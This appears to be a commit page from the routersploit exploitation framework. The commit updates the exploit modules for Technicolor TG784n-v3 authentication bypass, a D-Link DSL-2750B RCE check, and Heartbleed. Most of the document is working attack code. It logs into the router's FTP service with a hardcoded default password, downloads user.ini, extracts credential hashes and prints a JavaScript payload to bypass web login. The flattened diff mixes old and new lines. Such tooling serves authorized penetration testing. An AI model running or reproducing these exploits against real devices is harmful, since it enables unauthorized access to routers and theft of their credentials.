Skip to content

R
routersploit
Unverified Commit fa0b2fd0 by Marcin Bury Committed by GitHub
Options

Fixing tg784_authbypass, dlink-dsl and heartbleed (#411)

parent eae2c0c7
Showing with 55 additions and 104 deletions
routersploit/core/ftp/ftp_client.py
import socket
import ftplib
import io
from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
......@@ -62,3 +63,11 @@ class FTPClient(Exploit):
return True
return False
def ftp_get_content(self, ftp_client, remote_file):
if ftp_client:
fp_content = io.BytesIO()
ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write)
return fp_content.getvalue()
return None
routersploit/core/tcp/tcp_client.py
......@@ -64,6 +64,8 @@ class TCPClient(Exploit):
return response
except socket.timeout:
print_error("Socket did timeout")
except socket.error:
print_error("Socket error")
return None
......
routersploit/modules/exploits/generic/heartbleed.py
......@@ -39,6 +39,7 @@ class Exploit(TCPClient):
"https://gist.github.com/takeshixx/10107280",
"https://github.com/FiloSottile/Heartbleed",
"http://filippo.io/Heartbleed/",
"https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
),
"devices": (
"Multi",
......@@ -164,7 +165,9 @@ class Exploit(TCPClient):
return False
def bleed(self):
self.establish_connect()
if not self.establish_connect():
print_error("Exploit failed - could not establish connection")
return False
print_status("Sending Heartbeat...")
heartbeat_req = self.heartbeat_request(self.heartbeat_length)
......
routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py
......@@ -35,6 +35,7 @@ class Exploit(HTTPClient):
path=path
)
@mute
def check(self):
response = self.http_request(
method="GET",
......
routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py
import re
from StringIO import StringIO
from io import StringIO
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient
from routersploit.core.telnet.telnet_client import TelnetClient
class Exploit(FTPClient, TelnetClient):
class Exploit(FTPClient):
__info__ = {
"name": "Technicolor TG784n-v3 Auth Bypass",
"description": "Module exploits Technicolor TG784n-v3 authentication bypass vulnerability.",
"authors": [
"authors": (
"Jose Moreira", # vulnerability discovery & analysis
"0BuRner", # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # little fixes
],
"references": [
),
"references": (
"http://modem-help.forum-phpbb.co.uk/t1-fixing-username-password-problems",
"http://modem-help.forum-phpbb.co.uk/t2-howto-root-tg784",
],
"devices": [
),
"devices": (
"Technicolor TG784n-v3",
"Unknown number of Technicolor and Thompson routers",
]
)
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
port = OptPort(21, "Target FTP port")
ftp_port = exploits.Option(21, 'Target FTP port')
telnet_port = exploits.Option(23, 'Target Telnet port')
remote_user = exploits.Option('upgrade', 'Default FTP username')
remote_pass = exploits.Option('Th0ms0n!', 'Default FTP password for "upgrade" user')
config_path = exploits.Option('user.ini', 'Path to config file')
username = OptString("upgrade", "Default FTP username")
password = OptString("Th0ms0n!", "Default FTP password for \"upgrade\" user")
def run(self):
response = self.telnet_login()
if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
print_status("FTP and HTTP service active")
creds = self.ftp_get_config()
if creds:
print_status("Use javascript console (through developer tools) to bypass authentication:")
payload = ('var user = "{}"\n'
'var hash2 = "{}";\n'
'var HA2 = MD5("GET" + ":" + uri);\n'
'document.getElementById("user").value = user;\n'
'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
'document.authform.submit();\n')
creds = self.get_credentials()
if creds:
print_success("Found encrypted credentials:")
print_table(("Name", "Password", "Role", "Hash2", "Crypt"), *creds)
print_status("Use javascript console (through developer tools) to bypass authentication:")
payload = ('var user = "{}"\n'
'var hash2 = "{}";\n'
'var HA2 = MD5("GET" + ":" + uri);\n'
'document.getElementById("user").value = user;\n'
'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
'document.authform.submit();\n')
for user in creds:
print_success("User: {} Role: {}".format(user[0], user[2]))
print_info(payload.format(user[0], user[3]))
for user in creds:
print_success("User: {} Role: {}".format(user[0], user[2]))
print_info(payload.format(user[0], user[3]))
elif '}=>' in response:
print_success("Successful authentication through Telnet service")
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
tn.interact()
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
response = self.telnet_login()
if 'Login not allowed' in response and self.is_port_opened(self.ftp_port) and self.ftp_get_config():
return True
elif '}=>' in response:
if self.get_credentials():
return True
return False
def telnet_login(self):
print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
self.telnet_port,
self.remote_user,
self.remote_pass))
try:
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
response = tn.read_until("Login not allowed", 10)
tn.close()
except:
return ""
return response
def get_credentials(self):
print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
self.password))
def is_port_opened(self, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((self.target, port))
return True
except:
return False
finally:
s.close()
def ftp_get_config(self):
print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
self.ftp_port,
self.remote_user,
self.remote_pass))
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
ftp.login(self.remote_user, self.remote_pass)
print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
if self.config_path in ftp.nlst():
print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
r = StringIO()
ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
ftp.close()
data = r.getvalue()
creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
if creds:
print_success("Found encrypted credentials:")
print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
return creds
else:
print_error("Exploit failed - could not find any credentials")
except ftplib.all_errors:
print_error("Exploit failed - FTP error")
ftp_client = self.ftp_login(self.username, self.password)
if ftp_client:
print_success("Authentication successful")
content = self.ftp_get_content(ftp_client, "user.ini")
creds = re.findall(r"add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n", str(content, "utf-8"))
return creds
else:
print_error("Exploit failed - authentication failed")
return None
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment